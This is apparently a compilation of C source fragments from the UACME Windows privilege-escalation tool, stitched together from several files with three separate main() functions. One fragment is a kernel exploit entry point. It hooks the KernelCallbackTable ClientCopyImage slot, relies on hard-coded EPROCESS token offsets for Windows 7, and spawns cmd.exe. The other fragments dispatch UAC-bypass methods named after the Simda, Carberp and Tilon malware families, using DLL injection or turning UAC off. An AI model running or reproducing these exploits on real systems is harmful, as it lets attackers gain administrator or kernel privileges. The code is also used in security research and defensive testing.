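/*
* ucmInit
*
* Purpose:
*
* Prestart phase: fill the common data block g_ldp with the module
* handles, the system directory, the OS version and the WOW64 flag that
* the elevation methods rely on.
*
* Returns ERROR_SUCCESS, or a Win32 error code identifying the step that
* failed. On failure g_ldp is only partially filled and must not be used.
*
*/
UINT ucmInit(
	VOID
	)
{
	UINT	cch;

	//fill common data block
	RtlSecureZeroMemory(&g_ldp, sizeof(g_ldp));

	//
	// Remember dll handles. kernel32 is always mapped into a Win32
	// process; ole32 and shell32 are loaded on demand if not yet present.
	// Bare module names are resolved through the loader's search order;
	// this relies on these being KnownDLLs (they are on the Windows
	// versions this tool targets) — a full system path would remove
	// that assumption.
	//
	g_ldp.hKernel32 = GetModuleHandleW(L"kernel32.dll");
	if (g_ldp.hKernel32 == NULL) {
		return ERROR_INVALID_HANDLE;
	}
	g_ldp.hOle32 = GetModuleHandleW(L"ole32.dll");
	if (g_ldp.hOle32 == NULL) {
		g_ldp.hOle32 = LoadLibraryW(L"ole32.dll");
		if (g_ldp.hOle32 == NULL) {
			return ERROR_INVALID_HANDLE;
		}
	}
	g_ldp.hShell32 = GetModuleHandleW(L"shell32.dll");
	if (g_ldp.hShell32 == NULL) {
		g_ldp.hShell32 = LoadLibraryW(L"shell32.dll");
		if (g_ldp.hShell32 == NULL) {
			return ERROR_INVALID_HANDLE;
		}
	}

	//
	// Query basic directories. GetSystemDirectoryW returns 0 on failure
	// and, when the buffer is too small, the required size (including
	// the terminator) without filling the buffer — so a result of
	// MAX_PATH or more also means szSystemDirectory holds nothing usable.
	//
	cch = GetSystemDirectoryW(g_ldp.szSystemDirectory, MAX_PATH);
	if (cch == 0) {
		return ERROR_INVALID_DATA;
	}
	if (cch >= MAX_PATH) {
		return ERROR_INSUFFICIENT_BUFFER;
	}

	//
	// Query build number. RtlGetVersion is used rather than GetVersionEx,
	// presumably because it is not subject to application-compatibility
	// version lies; a failure here is fatal since methods are gated on
	// the build number.
	//
	RtlSecureZeroMemory(&g_ldp.osver, sizeof(g_ldp.osver));
	g_ldp.osver.dwOSVersionInfoSize = sizeof(g_ldp.osver);
	if (!NT_SUCCESS(RtlGetVersion(&g_ldp.osver))) {
		return ERROR_INVALID_ACCESS;
	}

	// supIsProcess32bit presumably reports WOW64 (32-bit process on a
	// 64-bit OS) rather than plain bitness — verify against its definition.
	g_ldp.IsWow64 = supIsProcess32bit(GetCurrentProcess());

	return ERROR_SUCCESS;
}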
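/*
* main
*
* Purpose:
*
* Program entry point.
*
* Replaces the User32_ClientCopyImage slot of the PEB KernelCallbackTable
* with hookCCI, then provokes the callback by creating a window. Once the
* hook reports success (g_shellCalled), a cmd.exe is spawned from
* %systemroot%\system32.
*
* The kernel-side offsets used below (g_EPROCESS_TokenOffset) are
* build-specific, so the version gate at the top must fail closed: an
* unknown build must never reach the hook.
*
*/
void main()
{

	PTEB			teb = NtCurrentTeb();
	PPEB			peb = teb->ProcessEnvironmentBlock;
	WNDCLASSEX		wincls;
	HINSTANCE		hinst = GetModuleHandle(NULL);
	BOOL			rv = TRUE;
	MSG				msg1;
	ATOM			class_atom;
	HWND			MainWindow;
	DWORD			prot;
	OSVERSIONINFOW	osver;

	DWORD					cch;
	TCHAR					cmdbuf[MAX_PATH * 2], sysdir[MAX_PATH + 1];
	STARTUPINFO				startupInfo;
	PROCESS_INFORMATION		processInfo;


	//
	// Version gate: Windows 7 SP1 (build 7601) and older only. The
	// RtlGetVersion result has to be checked: on failure dwBuildNumber
	// stays 0 and a bare "> 7601" test would let an unknown build
	// through to the hard-coded offsets below.
	//
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	if (!NT_SUCCESS(RtlGetVersion(&osver)) || (osver.dwBuildNumber > 7601)) {
		ExitProcess((UINT)-1);
		return;
	}

	//
	// Refuse to run as a WOW64 process (supIsProcess32bit presumably
	// wraps IsWow64Process; a native 32-bit build has its own offset
	// below and is not rejected here — confirm against the helper).
	//
	if (supIsProcess32bit(GetCurrentProcess())) {
		ExitProcess((UINT)-2);
		return;
	}

	g_OurPID = GetCurrentProcessId();
	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();

	//
	// EPROCESS.Token offsets, hard-coded for the Windows 7 builds the
	// gate above admits; they differ on other builds.
	//
#ifdef _WIN64
	g_EPROCESS_TokenOffset = 0x208;
#else
	g_EPROCESS_TokenOffset = 0xF8;
#endif


	if (g_PsLookupProcessByProcessIdPtr == NULL) {
		ExitProcess((UINT)-3);
		return;
	}

	RtlSecureZeroMemory(&wincls, sizeof(wincls));
	wincls.cbSize = sizeof(WNDCLASSEX);
	wincls.lpfnWndProc = &MainWindowProc;
	wincls.hInstance = hinst;	// same module handle is used for UnregisterClass below
	wincls.hIcon = LoadIcon(NULL, IDI_APPLICATION);
	wincls.lpszClassName = MAINWINDOWCLASSNAME;

	class_atom = RegisterClassEx(&wincls);
	while (class_atom) {

		g_w32theadinfo = teb->Win32ThreadInfo;

		//
		// Slot 0x36 of the KernelCallbackTable is taken to be
		// User32_ClientCopyImage; the index is undocumented and only
		// known to hold for the builds admitted above.
		//
		g_ppCCI = &((PVOID *)peb->KernelCallbackTable)[0x36];

		//
		// The table holds data pointers, not code, so PAGE_READWRITE is
		// all that is needed to swap the slot; the original protection is
		// restored right after the exchange. The hook itself stays
		// installed for the rest of the process lifetime — hookCCI is
		// presumably prepared to be called more than once.
		//
		if (!VirtualProtect(g_ppCCI, sizeof(PVOID), PAGE_READWRITE, &prot)) {
			break;
		}
		g_originalCCI = InterlockedExchangePointer(g_ppCCI, &hookCCI);
		VirtualProtect(g_ppCCI, sizeof(PVOID), prot, &prot);

		// Window creation is what drives the ClientCopyImage callback.
		MainWindow = CreateWindowEx(0, MAKEINTATOM(class_atom),
			NULL, 0, 0, 0, 0, 0, NULL, NULL, NULL, NULL);

		if (g_shellCalled == 1) {

			RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
			RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
			startupInfo.cb = sizeof(startupInfo);
			GetStartupInfo(&startupInfo);

			//
			// Build a full path so cmd.exe is not resolved through the
			// search path. cch includes the terminator; cch >= MAX_PATH
			// means the expansion was truncated.
			//
			RtlSecureZeroMemory(sysdir, sizeof(sysdir));
			cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
			if ((cch != 0) && (cch < MAX_PATH)) {
				RtlSecureZeroMemory(cmdbuf, sizeof(cmdbuf));
				_strcpy(cmdbuf, sysdir);
				_strcat(cmdbuf, TEXT("cmd.exe"));

				if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
					sysdir, &startupInfo, &processInfo))
				{
					CloseHandle(processInfo.hProcess);
					CloseHandle(processInfo.hThread);
				}
			}

		}
		else {
			OutputDebugString(TEXT(" Failed \r\n"));
		}

		if (!MainWindow)
			break;

		//
		// Standard message loop; GetMessage returns 0 on WM_QUIT and
		// -1 on error.
		//
		do {
			rv = GetMessage(&msg1, NULL, 0, 0);

			if (rv == -1)
				break;

			TranslateMessage(&msg1);
			DispatchMessage(&msg1);
		} while (rv != 0);

		break;
	}

	if (class_atom)
		UnregisterClass(MAKEINTATOM(class_atom), hinst);

	ExitProcess(0);
}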
File: main.c Progetto: 1ookup/UACME
/*
* main
*
* Purpose:
*
* Program entry point.
*
* Maps the first command-line parameter onto a method id, verifies the
* method is applicable to this OS build and process bitness, and runs
* it. Always terminates through ExitProcess(0).
*
*/
VOID main()
{
	//
	// Command-line value -> method id, with the trace printed on selection.
	//
	static const struct {
		LPCTSTR		lpParam;
		LPCTSTR		lpTrace;
		DWORD		dwMethod;
	} MethodTable[] = {
		{ TEXT("1"), TEXT("[UCM] Method Sysprep selected\n\r"),    METHOD_SYSPREP },
		{ TEXT("2"), TEXT("[UCM] Method Sysprep_ex selected\n\r"), METHOD_SYSPREP_EX },
		{ TEXT("3"), TEXT("[UCM] Method Oobe selected\n\r"),       METHOD_OOBE },
#ifndef _WIN64
		{ TEXT("4"), TEXT("[UCM] Method AppCompat selected\n\r"),  METHOD_APPCOMPAT },
#endif
		{ TEXT("5"), TEXT("[UCM] Method Simda selected\n\r"),      METHOD_SIMDA },
		{ TEXT("6"), TEXT("[UCM] Method Carberp selected\n\r"),    METHOD_CARBERP },
		{ TEXT("7"), TEXT("[UCM] Method Carberp_ex selected\n\r"), METHOD_CARBERP_EX }
	};

	BOOL					IsWow64 = FALSE;
	DWORD					cchParam = 0, dwType = 0;
	SIZE_T					i;
	WCHAR					szParam[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType = TokenElevationTypeDefault;
	RTL_OSVERSIONINFOW		osver;


	//
	// Verify system version: builds below 7000 are refused. The
	// RtlGetVersion result is not checked, but a failure leaves
	// dwBuildNumber at 0 and therefore also lands here (fails closed).
	//
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {
		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	//
	// The caller must be a split-token administrator running with the
	// limited (filtered) token; nothing else is a UAC-bypass scenario.
	//
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	//
	// Resolve the method id. An unknown or missing parameter leaves
	// dwType at 0, and the dispatch below then does nothing.
	//
	RtlSecureZeroMemory(szParam, sizeof(szParam));
	if (GetCommandLineParam(GetCommandLine(), 1, szParam, MAX_PATH, &cchParam)) {
		for (i = 0; i < sizeof(MethodTable) / sizeof(MethodTable[0]); i++) {
			if (lstrcmpi(szParam, MethodTable[i].lpParam) == 0) {
				OutputDebugString(MethodTable[i].lpTrace);
				dwType = MethodTable[i].dwMethod;
				break;
			}
		}
	}

	// Sysprep_ex targets Windows 8.1 (build 9600) and later only.
	if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
		MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"),
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:
	case METHOD_SIMDA:

		//
		// These inject into a native process without a heavens gate, so
		// a WOW64 caller is refused (debug builds excepted).
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (dwType == METHOD_SIMDA) {
			// Destructive: disables UAC system-wide, so ask first.
			if (MessageBox(GetDesktopWindow(),
				TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
				PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
			{
				if (ucmSimdaTurnOffUac()) {
					OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
				}
			}
		}
		else {
			if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
				OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
			}
		}
		break;

#ifndef _WIN64
	//
	// RedirectEXE exists only in the 32-bit appcompat engine.
	//
	case METHOD_APPCOMPAT:
		if (ucmAppcompatElevation()) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		if (dwType == METHOD_CARBERP) {
			//
			// Plain Carberp variant: Windows 7/8/8.1 only, and on 8+ the
			// WOW64 side has no migmiz to work with.
			//
			if (osver.dwBuildNumber > 9600) {
				MessageBoxW(GetDesktopWindow(),
					TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			if (IsWow64 && (osver.dwBuildNumber > 7601)) {
				MessageBoxW(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
		}

		if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	default:
		break;
	}

Done:
	ExitProcess(0);
}
/*
* ucmRefuseWow64
*
* Purpose:
*
* Methods that inject into a native process (no heavens gate) cannot be
* driven from a WOW64 process. Shows WOW64STRING and returns TRUE when
* the caller must bail out. Debug builds never refuse.
*
*/
static BOOL ucmRefuseWow64(
	BOOL IsWow64
	)
{
#ifdef _DEBUG
	(void)IsWow64;
	return FALSE;
#else
	if (!IsWow64) {
		return FALSE;
	}
	MessageBox(GetDesktopWindow(),
		WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
	return TRUE;
#endif
}

/*
* ucmMethodAvailable
*
* Purpose:
*
* Emit the selection trace for dwType and refuse methods that do not
* apply to this build or bitness (a message box explains why).
* Returns FALSE when the caller must bail out. Unknown ids pass through;
* main() then simply does nothing for them.
*
*/
static BOOL ucmMethodAvailable(
	DWORD dwType,
	DWORD dwBuildNumber
	)
{
	switch (dwType) {

	case METHOD_SYSPREP:
		OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
		// Pre-Blue only (Windows 8.1 is build 9600).
		if (dwBuildNumber > 9200) {
			MessageBox(GetDesktopWindow(), WINPREBLUE,
				PROGRAMTITLE, MB_ICONINFORMATION);
			return FALSE;
		}
		break;

	case METHOD_SYSPREP_EX:
		OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
		// Windows 8.1 and later only.
		if (dwBuildNumber < 9600) {
			MessageBox(GetDesktopWindow(), WINBLUEONLY,
				PROGRAMTITLE, MB_ICONINFORMATION);
			return FALSE;
		}
		break;

	case METHOD_OOBE:
		OutputDebugString(TEXT("[UCM] Oobe\n\r"));
		break;

	case METHOD_REDIRECTEXE:
		OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
		// 32-bit appcompat engine only.
#ifdef _WIN64
		MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
			PROGRAMTITLE, MB_ICONINFORMATION);
		return FALSE;
#else
		break;
#endif

	case METHOD_SIMDA:
		OutputDebugString(TEXT("[UCM] Simda\n\r"));
		break;

	case METHOD_CARBERP:
		OutputDebugString(TEXT("[UCM] Carberp\n\r"));
		break;

	case METHOD_CARBERP_EX:
		OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
		break;

	case METHOD_TILON:
		OutputDebugString(TEXT("[UCM] Tilon\n\r"));
		// Pre-Blue only.
		if (dwBuildNumber > 9200) {
			MessageBox(GetDesktopWindow(), WINPREBLUE,
				PROGRAMTITLE, MB_ICONINFORMATION);
			return FALSE;
		}
		break;

	case METHOD_AVRF:
		OutputDebugString(TEXT("[UCM] AVrf\n\r"));
		break;

	case METHOD_WINSAT:
		OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
		break;

	case METHOD_SHIMPATCH:
		OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
		// 32-bit appcompat engine only.
#ifdef _WIN64
		MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
			PROGRAMTITLE, MB_ICONINFORMATION);
		return FALSE;
#else
		break;
#endif

	default:
		break;
	}

	return TRUE;
}

/*
* main
*
* Purpose:
*
* Program entry point.
*
* Parses the method id from the first command-line parameter, checks
* its build/bitness preconditions and dispatches to the method. Always
* terminates through ExitProcess(0).
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					cchParam = 0, dwType = 0;
	WCHAR					*lpWinSatDll;
	WCHAR					szParam[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType = TokenElevationTypeDefault;
	RTL_OSVERSIONINFOW		osver;

	//
	// Verify system version: builds below 7000 are refused. The
	// RtlGetVersion result is not checked, but a failure leaves
	// dwBuildNumber at 0 and therefore also lands here (fails closed).
	//
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {
		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	//
	// The caller must be a split-token administrator running with the
	// limited (filtered) token.
	//
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."),
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	//
	// Method id from the command line (project strtoul helper); a
	// missing or unparsable parameter leaves dwType at 0.
	//
	RtlSecureZeroMemory(szParam, sizeof(szParam));
	if (GetCommandLineParam(GetCommandLine(), 1, szParam, MAX_PATH, &cchParam)) {
		dwType = strtoul(szParam);
	}

	// Per-method build/bitness preconditions, with their trace output.
	if (!ucmMethodAvailable(dwType, osver.dwBuildNumber)) {
		goto Done;
	}

	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:
	case METHOD_TILON:
		if (ucmRefuseWow64(IsWow64)) {
			goto Done;
		}
		if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

#ifndef _WIN64
	//
	// Appcompat methods exist only in the 32-bit build.
	//
	case METHOD_REDIRECTEXE:
	case METHOD_SHIMPATCH:
		if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif

	case METHOD_SIMDA:
		if (ucmRefuseWow64(IsWow64)) {
			goto Done;
		}
		// Destructive: disables UAC system-wide, so ask first.
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
		//
		// Plain Carberp variant: Windows 7/8/8.1 only, and on 8+ the
		// WOW64 side has no migmiz to work with.
		//
		if (osver.dwBuildNumber > 9600) {
			MessageBox(GetDesktopWindow(),
				TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
		if (IsWow64 && (osver.dwBuildNumber > 7601)) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
		if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_CARBERP_EX:
		if (ucmRefuseWow64(IsWow64)) {
			goto Done;
		}
		if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_AVRF:
		if (ucmRefuseWow64(IsWow64)) {
			goto Done;
		}
		if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
			OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
		}
		break;

	case METHOD_WINSAT:
		//
		// Handling the WOW64 environment (file system redirection) is
		// not worth it for a test tool; a WOW64 caller is refused
		// unconditionally here, debug builds included.
		//
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}

		// The DLL WinSAT picks up differs before and after Windows 8 (build 9200).
		lpWinSatDll = (osver.dwBuildNumber < 9200) ? L"powrprof.dll" : L"devobj.dll";

		if (ucmWinSATMethod(lpWinSatDll, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
		}
		break;

	default:
		break;
	}

Done:
	ExitProcess(0);
}